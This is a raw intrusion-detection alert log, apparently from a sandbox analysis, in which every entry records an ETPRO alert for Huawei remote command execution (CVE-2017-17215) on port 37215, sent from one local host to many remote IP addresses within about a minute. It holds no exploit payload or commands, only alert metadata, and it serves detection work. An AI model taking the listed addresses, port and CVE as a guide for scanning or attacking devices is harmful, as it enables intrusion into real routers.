                                            06/14/24-10:43:48.016396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4903437215192.168.2.14156.36.12.43
                                            06/14/24-10:44:26.997354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3442237215192.168.2.1441.207.201.116
                                            06/14/24-10:43:52.149713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289837215192.168.2.14156.66.75.211
                                            06/14/24-10:44:06.452551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4613237215192.168.2.1441.104.166.231
                                            06/14/24-10:44:02.382949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607637215192.168.2.14156.11.66.89
                                            06/14/24-10:44:26.977998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705837215192.168.2.14156.246.1.98
                                            06/14/24-10:44:26.977448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231637215192.168.2.14156.3.73.114
                                            06/14/24-10:44:04.405826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811437215192.168.2.1441.18.89.44
                                            06/14/24-10:44:14.683978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876037215192.168.2.14156.223.31.226
                                            06/14/24-10:44:10.546178TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342037215192.168.2.14197.245.58.109
                                            06/14/24-10:44:12.644237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4497037215192.168.2.1441.61.69.227
                                            06/14/24-10:44:16.736019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821637215192.168.2.14156.100.243.178
                                            06/14/24-10:44:24.933624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5532037215192.168.2.14156.101.92.133
                                            06/14/24-10:44:24.934817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4693437215192.168.2.14197.132.227.32
                                            06/14/24-10:44:04.419697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589237215192.168.2.14156.113.151.63
                                            06/14/24-10:43:36.725893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200637215192.168.2.1441.230.241.127
                                            06/14/24-10:44:08.518478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330837215192.168.2.14156.11.30.211
                                            06/14/24-10:44:24.914514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5244437215192.168.2.1441.165.132.224
                                            06/14/24-10:44:04.421620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4649237215192.168.2.14156.127.160.124
                                            06/14/24-10:44:35.177181TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606837215192.168.2.1441.47.61.116
                                            06/14/24-10:43:48.034462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3465437215192.168.2.1441.237.171.41
                                            06/14/24-10:44:08.519796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5422237215192.168.2.1441.47.98.73
                                            06/14/24-10:44:20.807457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6084237215192.168.2.1441.82.102.227
                                            06/14/24-10:44:31.050659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4494637215192.168.2.14156.240.225.231
                                            06/14/24-10:43:43.944695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903237215192.168.2.14197.48.174.91
                                            06/14/24-10:44:29.025397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4325037215192.168.2.1441.145.128.25
                                            06/14/24-10:44:04.406210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710637215192.168.2.14156.75.27.252
                                            06/14/24-10:43:54.185522TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337837215192.168.2.1441.235.69.233
                                            06/14/24-10:44:02.383745TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4481037215192.168.2.14197.180.199.79
                                            06/14/24-10:44:24.916297TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5403237215192.168.2.1441.103.65.205
                                            06/14/24-10:44:22.881666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554837215192.168.2.14156.43.92.95
                                            06/14/24-10:44:00.325983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4365637215192.168.2.14156.231.128.51
                                            06/14/24-10:44:02.364958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310637215192.168.2.1441.193.22.138
                                            06/14/24-10:44:02.368799TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877837215192.168.2.14197.231.100.31
                                            06/14/24-10:44:02.365565TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204437215192.168.2.1441.181.49.253
                                            06/14/24-10:43:34.662387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305837215192.168.2.14156.173.40.172
                                            06/14/24-10:43:37.772551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5604437215192.168.2.1441.179.177.144
                                            06/14/24-10:44:31.094362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4083237215192.168.2.14156.26.144.224
                                            06/14/24-10:44:24.934447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4541437215192.168.2.1441.167.43.168
                                            06/14/24-10:44:10.545536TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487837215192.168.2.14156.66.100.234
                                            06/14/24-10:44:20.805014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5589437215192.168.2.14197.41.77.149
                                            06/14/24-10:44:33.132020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264437215192.168.2.1441.20.221.49
                                            06/14/24-10:44:04.410511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3500837215192.168.2.1441.157.247.43
                                            06/14/24-10:43:45.969688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4107237215192.168.2.14197.207.29.22
                                            06/14/24-10:44:33.152055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4332437215192.168.2.14197.158.33.19
                                            06/14/24-10:44:00.340450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777437215192.168.2.14156.130.137.198
                                            06/14/24-10:43:48.033416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810837215192.168.2.1441.71.86.50
                                            06/14/24-10:43:39.791428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874237215192.168.2.14156.221.59.122
                                            06/14/24-10:44:12.614244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5605837215192.168.2.14197.33.218.255
                                            06/14/24-10:44:31.087308TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821237215192.168.2.14197.174.20.52
                                            06/14/24-10:44:22.878634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003637215192.168.2.14197.132.243.94
                                            06/14/24-10:44:27.000687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5190837215192.168.2.14197.84.236.207
                                            06/14/24-10:44:04.422109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042237215192.168.2.14156.165.119.195
                                            06/14/24-10:44:06.449173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370037215192.168.2.1441.15.43.14
                                            06/14/24-10:44:06.472915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050837215192.168.2.1441.175.98.35
                                            06/14/24-10:44:16.715659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652237215192.168.2.14156.117.136.51
                                            06/14/24-10:44:16.715180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407037215192.168.2.14156.81.63.74
                                            06/14/24-10:43:37.761807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022837215192.168.2.14197.11.114.110
                                            06/14/24-10:44:12.625172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135437215192.168.2.1441.51.22.217
                                            06/14/24-10:44:22.858976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985037215192.168.2.14197.25.38.26
                                            06/14/24-10:44:26.996999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5197037215192.168.2.1441.132.224.174
                                            06/14/24-10:43:54.184331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469037215192.168.2.1441.92.106.87
                                            06/14/24-10:44:35.179336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4885437215192.168.2.1441.24.10.21
                                            06/14/24-10:43:48.021449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4194037215192.168.2.1441.90.6.169
                                            06/14/24-10:44:29.012635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967437215192.168.2.14156.89.124.235
                                            06/14/24-10:44:06.448898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153837215192.168.2.1441.90.153.108
                                            06/14/24-10:44:31.092736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5141037215192.168.2.1441.235.124.5
                                            06/14/24-10:44:22.861928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5900237215192.168.2.14197.233.62.22
                                            06/14/24-10:44:10.547792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455037215192.168.2.14197.194.216.252
                                            06/14/24-10:44:06.452403TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4081437215192.168.2.1441.235.211.176
                                            06/14/24-10:44:16.735190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605237215192.168.2.14197.8.62.14
                                            06/14/24-10:43:43.944466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223437215192.168.2.1441.98.99.219
                                            06/14/24-10:43:41.906127TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5689837215192.168.2.14197.108.47.56
                                            06/14/24-10:44:08.517774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4251837215192.168.2.1441.48.195.197
                                            06/14/24-10:44:18.762033TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4386237215192.168.2.1441.0.149.107
                                            06/14/24-10:44:18.763720TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4480637215192.168.2.14197.255.184.226
                                            06/14/24-10:44:26.986308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699437215192.168.2.14197.193.153.198
                                            06/14/24-10:43:41.899293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450237215192.168.2.1441.87.242.207
                                            06/14/24-10:43:43.942580TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4080637215192.168.2.1441.26.46.56
                                            06/14/24-10:43:54.202837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934637215192.168.2.14156.227.192.213
                                            06/14/24-10:43:41.899265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3756837215192.168.2.1441.84.195.145
                                            06/14/24-10:43:34.663033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5860837215192.168.2.1441.135.86.170
                                            06/14/24-10:44:24.943190TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5741637215192.168.2.1441.153.248.7
                                            06/14/24-10:43:48.018861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6019237215192.168.2.1441.7.158.123
                                            06/14/24-10:43:45.988969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4219237215192.168.2.14156.26.137.91
                                            06/14/24-10:44:08.518411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791837215192.168.2.1441.188.157.176
                                            06/14/24-10:43:52.159250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4364837215192.168.2.1441.17.166.251
                                            06/14/24-10:44:20.830010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5350637215192.168.2.14156.130.89.157
                                            06/14/24-10:44:10.548560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5776437215192.168.2.14197.168.77.180
                                            06/14/24-10:44:12.645291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3901837215192.168.2.1441.138.40.192
                                            06/14/24-10:43:56.226367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4189637215192.168.2.14156.149.251.76
                                            06/14/24-10:43:37.760217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132237215192.168.2.1441.142.237.9
                                            06/14/24-10:43:48.033511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3342437215192.168.2.1441.211.206.204
                                            06/14/24-10:44:10.565849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5661837215192.168.2.14197.96.104.224
                                            06/14/24-10:43:34.663781TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5908037215192.168.2.14197.35.88.66
                                            06/14/24-10:44:31.053801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345437215192.168.2.14156.63.103.94
                                            06/14/24-10:43:45.967882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3574237215192.168.2.1441.254.118.27
                                            06/14/24-10:44:22.859990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411237215192.168.2.14156.79.12.229
                                            06/14/24-10:43:56.224853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840437215192.168.2.14156.36.10.133
                                            06/14/24-10:44:02.382459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4243437215192.168.2.14197.124.119.54
                                            06/14/24-10:43:39.811261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472037215192.168.2.14197.169.57.44
                                            06/14/24-10:44:20.828476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848837215192.168.2.14197.174.114.23
                                            06/14/24-10:43:41.900240TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898037215192.168.2.14197.40.161.110
                                            06/14/24-10:44:06.453035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913037215192.168.2.14156.126.211.79
                                            06/14/24-10:43:36.727113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5859037215192.168.2.14156.196.49.76
                                            06/14/24-10:44:31.052803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4797637215192.168.2.1441.246.50.77
                                            06/14/24-10:44:20.807352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4540037215192.168.2.14156.107.251.137
                                            06/14/24-10:43:41.906394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5302237215192.168.2.1441.119.231.97
                                            06/14/24-10:44:02.387158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766237215192.168.2.1441.144.146.179
                                            06/14/24-10:44:08.500835TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4808237215192.168.2.1441.165.41.121
                                            06/14/24-10:44:20.828836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940037215192.168.2.14197.184.53.125
                                            06/14/24-10:43:50.071682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4448837215192.168.2.14156.71.121.210
                                            06/14/24-10:44:16.737776TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4616637215192.168.2.14156.209.19.32
                                            06/14/24-10:44:14.672246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4577637215192.168.2.14197.96.106.217
                                            06/14/24-10:43:37.760895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156237215192.168.2.1441.238.214.92
                                            06/14/24-10:43:58.293791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828437215192.168.2.14197.201.226.16
                                            06/14/24-10:43:54.200312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4636037215192.168.2.14156.188.103.110
                                            06/14/24-10:44:02.382975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598237215192.168.2.14156.143.115.38
                                            06/14/24-10:43:48.020073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947037215192.168.2.14197.130.241.177
                                            06/14/24-10:43:36.699798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3754237215192.168.2.14197.99.180.169
                                            06/14/24-10:44:18.761390TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4755437215192.168.2.14197.50.187.249
                                            06/14/24-10:44:26.977596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948837215192.168.2.14197.127.198.1
                                            06/14/24-10:44:08.501888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674037215192.168.2.14156.157.69.237
                                            06/14/24-10:43:43.941642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4720637215192.168.2.14156.57.245.11
                                            06/14/24-10:43:41.848675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419637215192.168.2.14156.40.207.143
                                            06/14/24-10:44:31.051021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268237215192.168.2.1441.244.75.162
                                            06/14/24-10:43:52.145959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913637215192.168.2.1441.249.50.32
                                            06/14/24-10:44:06.472104TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4577837215192.168.2.14197.0.110.75
                                            06/14/24-10:43:34.663018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5499237215192.168.2.14197.147.108.144
                                            06/14/24-10:44:04.404973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5518837215192.168.2.1441.225.210.250
                                            06/14/24-10:43:56.250838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176437215192.168.2.14197.53.31.6
                                            06/14/24-10:43:48.020292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890837215192.168.2.14197.46.19.4
                                            06/14/24-10:44:16.716328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795837215192.168.2.1441.42.139.94
                                            06/14/24-10:43:56.225292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4805037215192.168.2.14156.63.212.227
                                            06/14/24-10:44:10.545405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6044437215192.168.2.14197.42.133.21
                                            06/14/24-10:43:54.200437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5226037215192.168.2.14197.3.41.6
                                            06/14/24-10:43:54.183688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3734437215192.168.2.14197.153.37.28
                                            06/14/24-10:43:45.968751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5502437215192.168.2.14197.68.142.30
                                            06/14/24-10:43:37.759355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3283437215192.168.2.14197.34.208.184
                                            06/14/24-10:44:08.503463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880437215192.168.2.14197.132.6.235
                                            06/14/24-10:44:29.025164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6054037215192.168.2.1441.4.82.67
                                            06/14/24-10:43:37.762928TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5790837215192.168.2.14197.28.131.87
                                            06/14/24-10:43:58.275775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147437215192.168.2.1441.244.209.201
                                            06/14/24-10:43:58.274894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674837215192.168.2.14197.23.187.238
                                            06/14/24-10:44:08.501717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3462437215192.168.2.1441.131.52.39
                                            06/14/24-10:44:20.829227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651637215192.168.2.14197.170.225.243
                                            06/14/24-10:44:04.419754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087837215192.168.2.14156.177.160.156
                                            06/14/24-10:44:33.150443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4741037215192.168.2.14156.12.55.236
                                            06/14/24-10:44:14.681215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703237215192.168.2.14197.50.8.201
                                            06/14/24-10:44:22.858288TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5049237215192.168.2.14156.12.231.107
                                            06/14/24-10:43:50.113988TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588037215192.168.2.14197.240.162.73
                                            06/14/24-10:44:16.715690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153837215192.168.2.14197.57.77.39
                                            06/14/24-10:43:43.967812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824037215192.168.2.1441.249.239.87
                                            06/14/24-10:43:45.969119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5199237215192.168.2.14156.133.51.70
                                            06/14/24-10:43:45.991041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458837215192.168.2.1441.210.88.81
                                            06/14/24-10:44:31.084773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5428237215192.168.2.14156.103.231.60
                                            06/14/24-10:44:00.341235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243837215192.168.2.14156.25.3.89
                                            06/14/24-10:44:16.716493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906037215192.168.2.14156.252.187.38
                                            06/14/24-10:44:18.763885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.14197.110.251.141
                                            06/14/24-10:43:54.202804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634437215192.168.2.14197.131.111.51
                                            06/14/24-10:44:18.765803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5281637215192.168.2.14197.246.210.96
                                            06/14/24-10:43:48.018211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552237215192.168.2.14156.174.28.191
                                            06/14/24-10:43:48.033115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5563237215192.168.2.14156.26.181.114
                                            06/14/24-10:43:50.071172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935237215192.168.2.1441.208.150.216
                                            06/14/24-10:44:04.408738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946237215192.168.2.1441.252.186.249
                                            06/14/24-10:44:22.878903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3471837215192.168.2.14156.168.41.34
                                            06/14/24-10:44:18.776331TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625637215192.168.2.1441.125.196.113
                                            06/14/24-10:44:33.134316TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5051437215192.168.2.14156.188.36.31
                                            06/14/24-10:44:14.672990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576837215192.168.2.14156.196.235.9
                                            06/14/24-10:43:36.701930TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3629437215192.168.2.14197.78.163.231
                                            06/14/24-10:43:43.972221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5821037215192.168.2.14156.67.168.160
                                            06/14/24-10:44:12.624790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439837215192.168.2.14197.70.204.15
                                            06/14/24-10:43:36.702113TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136437215192.168.2.1441.177.69.162
                                            06/14/24-10:43:56.226517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411237215192.168.2.14197.42.13.154
                                            06/14/24-10:43:48.031459TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894437215192.168.2.14156.100.93.206
                                            06/14/24-10:43:45.969057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500037215192.168.2.1441.151.141.75
                                            06/14/24-10:43:36.728284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5415837215192.168.2.14156.214.117.2
                                            06/14/24-10:43:34.676584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994037215192.168.2.14197.224.71.250
                                            06/14/24-10:44:26.986397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693637215192.168.2.14197.161.14.43
                                            06/14/24-10:43:56.225918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3441437215192.168.2.1441.52.107.30
                                            06/14/24-10:43:54.186155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6042237215192.168.2.14156.79.103.131
                                            06/14/24-10:44:00.319906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5332437215192.168.2.14197.110.130.133
                                            06/14/24-10:44:10.548795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3667637215192.168.2.1441.189.41.12
                                            06/14/24-10:43:43.942691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5651037215192.168.2.1441.230.87.80
                                            06/14/24-10:43:41.850730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5502037215192.168.2.14156.3.252.137
                                            06/14/24-10:44:33.148476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764237215192.168.2.1441.82.148.229
                                            06/14/24-10:43:41.846712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247637215192.168.2.14197.28.230.71
                                            06/14/24-10:44:10.548697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115037215192.168.2.1441.145.173.55
